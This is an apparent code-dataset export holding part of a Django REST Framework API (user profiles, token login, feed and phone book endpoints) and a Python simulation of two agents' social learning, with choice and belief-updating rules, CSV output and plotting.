        return Response({'message': 'Hello!', 'a_viewset': a_viewset})

    def create(self, request):
        """Create a new Hello message."""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            # Invalid payload: echo the validation errors back.
            return Response(serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
        name = serializer.validated_data.get('name')
        return Response({'message': f'Hello {name}!'})

    def retrieve(self, request, pk=None):
        """Handle getting an object by its ID."""
        return Response({'http_method': 'GET'})

    def update(self, request, pk=None):
        """Handle updating an object."""
        return Response({'http_method': 'PUT'})

    def partial_update(self, request, pk=None):
        """Handle partial updating an object."""
        return Response({'http_method': 'PATCH'})

    def destroy(self, request, pk=None):
        """Handle removing an object."""
        return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
    """Handle creating and updating profiles"""
    serializer_class = serializers.UserProfileSerializer
    queryset = models.UserProfile.objects.all()
    # Token-based authentication; the permission class restricts profile
    # modification to the owning user.
    authentication_classes = (TokenAuthentication,)
    permission_classes = (permissions.UpdateOwnProfile,)
    # Enable ?search= lookups against name and email.
    filter_backends = (filters.SearchFilter,)
    search_fields = ('name', 'email')
class UserLoginApiView(ObtainAuthToken):
    """Handles creating user authentication tokens"""
    # ObtainAuthToken does not enable renderers by default; setting the
    # defaults here makes this endpoint visible in the browsable API.
    renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
    """Handles creating/reading/updating profile feed items"""
    authentication_classes = (TokenAuthentication,)
    serializer_class = serializers.ProfileFeedItemSerializer
    queryset = models.ProfileFeedItem.objects.all()
    # Only authenticated users may access the feed, and only the author
    # of a status may modify it.
    permission_classes = (
        permissions.UpdateOwnStatus,
        IsAuthenticated
    )
    def perform_create(self, serializer):
        """Sets the user profile to the logged in user"""
        serializer.save(user_profile=self.request.user)
class PhoneBookViewSet(viewsets.ViewSet):
    """Handle CRUD requests to the phone book."""

    serializer_class = serializers.PhoneBookSerializer

    def _validated_save(self, serializer, success_status=status.HTTP_200_OK):
        # Shared validate/save/respond step used by create, update and
        # partial_update (previously duplicated three times).
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, success_status)
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)

    def list(self, request):
        """Return every phone book entry."""
        queryset = models.PhoneBook.objects.all()
        serializer = self.serializer_class(queryset, many=True)
        return Response(serializer.data)

    def create(self, request):
        """Create a new entry; 201 on success, 400 on validation error."""
        serializer = self.serializer_class(data=request.data)
        return self._validated_save(serializer, status.HTTP_201_CREATED)

    def destroy(self, request, pk=None):
        """Delete the entry with id *pk* (404 when absent)."""
        obj = get_object_or_404(models.PhoneBook, id=pk)
        obj.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)

    def retrieve(self, request, pk=None):
        """Return a single entry by its id (404 when absent)."""
        obj = get_object_or_404(models.PhoneBook, id=pk)
        serializer = self.serializer_class(obj)
        return Response(serializer.data)

    def update(self, request, pk=None):
        """Full update of an existing entry."""
        obj = get_object_or_404(models.PhoneBook, id=pk)
        serializer = self.serializer_class(obj, data=request.data)
        return self._validated_save(serializer)

    def partial_update(self, request, pk=None):
        """Partial update of an existing entry."""
        obj = get_object_or_404(models.PhoneBook, id=pk)
        serializer = self.serializer_class(obj, data=request.data, partial=True)
        return self._validated_save(serializer)
| [
"ckilcioglu@gmail.com"
] | ckilcioglu@gmail.com |
202dca8ab3b08386832090e04de47e161cbdd4e6 | 135807a198ae54d6560a76a0739773b37a59afa5 | /Social Learning in learning by doing process.py | 36a832cac7b580a941f2e4df4ab13b8dc05d9d36 | [] | no_license | sanghyunpark4/Social-Learning-and-SCBB | 7315201320a98cfc0c0a7c793c928ae88e4cb716 | 79fb84efd1505aedaa4f2a7f6b9dc2076f31e789 | refs/heads/main | 2023-01-19T22:24:57.518533 | 2020-11-23T07:17:05 | 2020-11-23T07:17:05 | 315,229,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,830 | py | # Social learning and SCBB in learning by doing process Ver 1.0
# Importing modules
# from IPython import get_ipython
# get_ipython().magic('reset -sf')
import math
import random
import numpy as np
import matplotlib.pyplot as plt
import csv
import datetime
STARTINGTIME = datetime.datetime.now().replace(microsecond=0)
#####################################################################################################
# SET SIMULATION PARAMETERS HERE
T = 1000 # number of periods to simulate the model
sampleSize = 1000 # sample size
socialLearning = 1 # if 0, then agents do not from learn from experience of the other.
# if 1, then agents do observational learning.
# if 2, then agents do belief sharing.
choiceRule = 0 # if 0, then agents do greedy search.
# if 1, then agents follow soft-max rule with fixed tau.
# if 2, then agents follow soft-max rule with endogeneous tau.
tau = 0.05 # Soft-max temperature for fixed tau case
updateRule = 0 # if 0, then agents follow a Bayesian updating.
# if 1, then agents follow ERWA.
phi = 0.1 # degree of recency for EWRA rule
if socialLearning == 0:
print("Agents are isolated from each other (no social learning)")
elif socialLearning == 1:
print("Agents do observational learning")
elif socialLearning == 2:
print("Agents do belief sharing")
if choiceRule == 0:
if updateRule == 0:
print("Agents follow greedy search and bayesian updating")
elif updateRule == 1:
print("Agents follow greedy search and ERWA")
elif choiceRule == 1:
if updateRule == 0:
print("Agents follow soft-max with fixed tau and bayesian updating")
elif updateRule == 1:
print("Agents follow soft-max with fixed tau and ERWA")
elif choiceRule == 2:
if updateRule == 0:
print("Agents follow soft-max with endogenous tau and bayesian updating")
elif updateRule == 1:
print("Agents follow soft-max with endogenous and ERWA")
# Task environment
M = 50 # number of alternatives
noise = 0 # if noise = 0, then there is no noise in feedback. If noise > 0, then feedback is noisy.
reality = np.zeros(M)
######################################################################################################
# DEFINING RESULTS VECTORS
# Each array is (T periods) x (sampleSize runs); one cell per period/run.
avg_agent_perf1 = np.zeros((T, sampleSize))
avg_agent_perf2 = np.zeros((T, sampleSize))
correct_choice1 = np.zeros((T, sampleSize))
correct_choice2 = np.zeros((T, sampleSize))
both_correct = np.zeros((T, sampleSize))
biased_beliefs1 = np.zeros((T, sampleSize))
biased_beliefs2 = np.zeros((T, sampleSize))
switching_behavior1 = np.zeros((T, sampleSize))
switching_behavior2 = np.zeros((T, sampleSize))
convergence = np.zeros((T, sampleSize))
# Defining functions
def genEnvironment(M): # Generate task environment
    """Return M alternative payoffs drawn i.i.d. uniform on [0, 1)."""
    return np.random.rand(M)
def genPriors(M): # Generate random priors
    """Return M prior beliefs drawn i.i.d. uniform on [0, 1)."""
    return np.random.rand(M)
def getBest(reality): # max action selection
    """Index of the highest payoff in *reality*."""
    return reality.argmax(axis=0)
def dissimilarity(l1, l2):
    """Mean absolute difference between the belief vector and reality.

    The original divided by the module-level constant ``M``; using the
    vectors' own length (via ``np.mean``) is equivalent for all callers
    (both arguments are always length-M vectors) and removes the hidden
    dependence on a global.
    """
    return float(np.mean(np.absolute(l1 - l2)))
def hardmax(attraction, t, M): # max action selection
    """Greedy choice: the highest-attraction index, with a uniform
    random pick when all attractions are identical.  *t* is unused but
    kept for signature compatibility with softmax."""
    if attraction.max(axis=0) == attraction.min(axis=0):
        return random.randint(0, M - 1)
    return attraction.argmax(axis=0)
def softmax(attraction, t, M, tau): # softmax action selection
    """Sample an action index from the Boltzmann distribution over
    *attraction* with temperature *tau* (roulette-wheel draw).

    Two fixes over the original:
    - subtracting the max before exponentiating is the numerically
      stable softmax; the original ``math.exp(a / tau)`` raised
      OverflowError for large attraction/tau ratios;
    - the final ``return M - 1`` guards the rare case where
      floating-point rounding leaves the cumulative probability just
      below the roulette draw; the original fell off the loop and
      implicitly returned None.
    *t* is unused but kept for signature compatibility.
    """
    scaled = np.asarray(attraction, dtype=float) / tau
    weights = np.exp(scaled - scaled.max())
    prob = weights / weights.sum()
    roulette = random.random()
    cumulative = 0.0
    for i in range(M):
        cumulative += prob[i]
        if cumulative > roulette:
            return i
    return M - 1
# Time varying model objects
# (all of these are re-initialized at the top of every sample run below)
attraction1 = np.zeros(M)
attraction2 = np.zeros(M)
attractionlag1 = np.zeros(M)
attractionlag2 = np.zeros(M)
# To keep track of count of # times each action was selected, used by
# the Bayesian (running-mean) updating rule
count1 = np.zeros(M)
count2 = np.zeros(M)
# SIMULATION IS RUN HERE
for a in range(sampleSize):
    # Fresh environment, priors and bookkeeping for each sample run.
    reality = genEnvironment(M)
    attraction1 = genPriors(M)
    attraction2 = genPriors(M)
    count1 = np.ones(M)
    count2 = np.ones(M)
    bestchoice = getBest(reality)
    pchoice1 = -1
    pchoice2 = -1
    for t in range(T):
        # --- action selection, agent 1 ---
        if choiceRule == 0:
            choice1 = hardmax(attraction1, t, M)
        elif choiceRule == 1:
            choice1 = softmax(attraction1, t, M, tau)
        elif choiceRule == 2:
            # Endogenous temperature: explore more when recent payoff is low.
            if t < 2:
                tau = 1
            else:
                tau = 1 - avg_agent_perf1[t-1, a]
            if tau <= 0.01:
                choice1 = hardmax(attraction1, t, M)
            else:
                choice1 = softmax(attraction1, t, M, tau)
        # --- action selection, agent 2 ---
        if choiceRule == 0:
            choice2 = hardmax(attraction2, t, M)
        elif choiceRule == 1:
            choice2 = softmax(attraction2, t, M, tau)
        elif choiceRule == 2:
            if t < 2:
                tau = 1
            else:
                tau = 1 - avg_agent_perf2[t-1, a]
            if tau <= 0.01:
                choice2 = hardmax(attraction2, t, M)
            else:
                choice2 = softmax(attraction2, t, M, tau)
        # --- payoffs (optionally noisy) and per-period metrics ---
        payoff1 = reality[choice1] + noise * (0.5 - random.random())
        payoff2 = reality[choice2] + noise * (0.5 - random.random())
        avg_agent_perf1[t][a] = payoff1
        avg_agent_perf2[t][a] = payoff2
        if choice1 == bestchoice:
            correct_choice1[t][a] = 1
        if choice2 == bestchoice:
            correct_choice2[t][a] = 1
        if (choice1 == bestchoice) & (choice2 == bestchoice):
            both_correct[t][a] = 1
        biased_beliefs1[t][a] = dissimilarity(reality, attraction1)
        biased_beliefs2[t][a] = dissimilarity(reality, attraction2)
        if choice1 != pchoice1:
            switching_behavior1[t][a] = 1
        if choice2 != pchoice2:
            switching_behavior2[t][a] = 1
        if choice1 == choice2:
            convergence[t][a] = 1
        pchoice1 = choice1
        pchoice2 = choice2
        # --- belief updating ---
        if socialLearning == 0:
            # Isolated learning: each agent updates only its own choice.
            count1[choice1] += 1
            count2[choice2] += 1
            if updateRule == 0:
                attraction1[choice1] = (count1[choice1] - 1) / count1[choice1] * attraction1[choice1] + 1 / count1[choice1] * payoff1
                attraction2[choice2] = (count2[choice2] - 1) / count2[choice2] * attraction2[choice2] + 1 / count2[choice2] * payoff2
            elif updateRule == 1:
                attraction1[choice1] = (1 - phi) * attraction1[choice1] + phi * payoff1
                attraction2[choice2] = (1 - phi) * attraction2[choice2] + phi * payoff2
        elif socialLearning == 1:
            # Observational learning: each agent also updates its belief
            # about the OTHER agent's chosen action, using the other
            # agent's observed payoff.
            count1[choice1] += 1
            count2[choice2] += 1
            if updateRule == 0:
                attraction1[choice1] = (count1[choice1] - 1) / count1[choice1] * attraction1[choice1] + 1 / count1[choice1] * payoff1
                attraction2[choice2] = (count2[choice2] - 1) / count2[choice2] * attraction2[choice2] + 1 / count2[choice2] * payoff2
                count2[choice1] += 1
                count1[choice2] += 1
                attraction2[choice1] = (count2[choice1] - 1) / count2[choice1] * attraction2[choice1] + 1 / count2[choice1] * payoff1
                attraction1[choice2] = (count1[choice2] - 1) / count1[choice2] * attraction1[choice2] + 1 / count1[choice2] * payoff2
            elif updateRule == 1:
                attraction1[choice1] = (1 - phi) * attraction1[choice1] + phi * payoff1
                attraction2[choice2] = (1 - phi) * attraction2[choice2] + phi * payoff2
                count2[choice1] += 1
                count1[choice2] += 1
                # BUG FIX: the observed update must use the OBSERVED agent's
                # payoff (payoff1 for choice1, payoff2 for choice2), matching
                # the Bayesian branch above; the original used the payoffs
                # swapped here.  The original also re-incremented
                # count1[choice1]/count2[choice2] a second time instead of
                # the observed-choice counters (counts are unused by ERWA,
                # so this only fixes the bookkeeping).
                attraction2[choice1] = (1 - phi) * attraction2[choice1] + phi * payoff1
                attraction1[choice2] = (1 - phi) * attraction1[choice2] + phi * payoff2
        elif socialLearning == 2:
            # Belief sharing: update own beliefs, then both agents adopt
            # the average of the two attraction vectors.
            count1[choice1] += 1
            count2[choice2] += 1
            if updateRule == 0:
                attraction1[choice1] = (count1[choice1] - 1) / count1[choice1] * attraction1[choice1] + 1 / count1[choice1] * payoff1
                attraction2[choice2] = (count2[choice2] - 1) / count2[choice2] * attraction2[choice2] + 1 / count2[choice2] * payoff2
            elif updateRule == 1:
                attraction1[choice1] = (1 - phi) * attraction1[choice1] + phi * payoff1
                attraction2[choice2] = (1 - phi) * attraction2[choice2] + phi * payoff2
            attractionlag1 = np.copy(attraction1)
            attractionlag2 = np.copy(attraction2)
            attraction1 = np.add(attractionlag1, attractionlag2)/2
            attraction2 = np.add(attractionlag1, attractionlag2)/2
# Compile the final output: column 0 is the 1-based period, columns 1-10
# are the sample means of each per-period metric, in fixed order.
metrics = (avg_agent_perf1, avg_agent_perf2, correct_choice1,
           correct_choice2, both_correct, biased_beliefs1,
           biased_beliefs2, switching_behavior1, switching_behavior2,
           convergence)
result_org = np.zeros((T, 11))
for t in range(T):
    result_org[t, 0] = t + 1
    for col, metric in enumerate(metrics, start=1):
        result_org[t, col] = float(np.sum(metric[t, :])) / sampleSize
# WRITING RESULTS TO CSV FILE
filename = ("Social learning" + " (mode = " + str(socialLearning) +"; choice rule = "+ str(choiceRule)+"; updating rule = "+ str(updateRule)+ ').csv')
with open(filename, 'w', newline='') as f:
    thewriter = csv.writer(f)
    # Header row, then one row per simulated period.
    thewriter.writerow(
        ['Period', 'Perf1', 'Perf2', 'Prop(the optimal choice, agent 1)', 'Prop(the optimal choice, agent 2)', 'Prop(the optimal choice, both agents)', 'Dist(beliefs and reality, agent1)','Dist(beliefs and reality, agent2)', 'Switching1', 'Switching2', 'Convergence of action'])
    for values in result_org:
        thewriter.writerow(values)
# (the redundant explicit f.close() was removed: the ``with`` block
# already closes the file on exit)
##PRINTING END RUN RESULTS
# BUG FIX: the "average performance" was computed as (col1 + col1)/2 in
# both the print and the plot; the second term must be agent 2's
# performance (column 2).
print("Final performance " + str((result_org[T - 1, 1]+result_org[T - 1, 2])/2))
print("Final proportion of the optimal choice " + str(result_org[T - 1, 5]))
#
##GRAPHICAL OUTPUT
plt.style.use('ggplot') # Setting the plotting style
fig = plt.figure(figsize=(8.27, 11.69), dpi=100)
ax1 = plt.subplot2grid((6, 5), (4, 1), colspan=3)
ax1.plot(result_org[:, 0], (result_org[:, 1]+result_org[:, 2])/2, color='black', linestyle='--', label='Average Performance')
ax1.plot(result_org[:, 0], result_org[:, 5], color='blue', linestyle='--', label='Probability that both agents choose the optimal action')
ax1.plot(result_org[:, 0], result_org[:, 10], color='black', linestyle='--', label='Convergence in action')
ax1.set_xlabel('t', fontsize=12)
ax1.legend(bbox_to_anchor=(0., -0.8, 1., .102), loc=3,
           ncol=2, mode="expand", borderaxespad=0., fontsize=9)
# Wall-clock duration of the whole run.
ENDINGTIME = datetime.datetime.now().replace(microsecond=0)
TIMEDIFFERENCE = ENDINGTIME - STARTINGTIME
# print 'Computation time:', TIMEDIFFERENCE
| [
"noreply@github.com"
] | noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.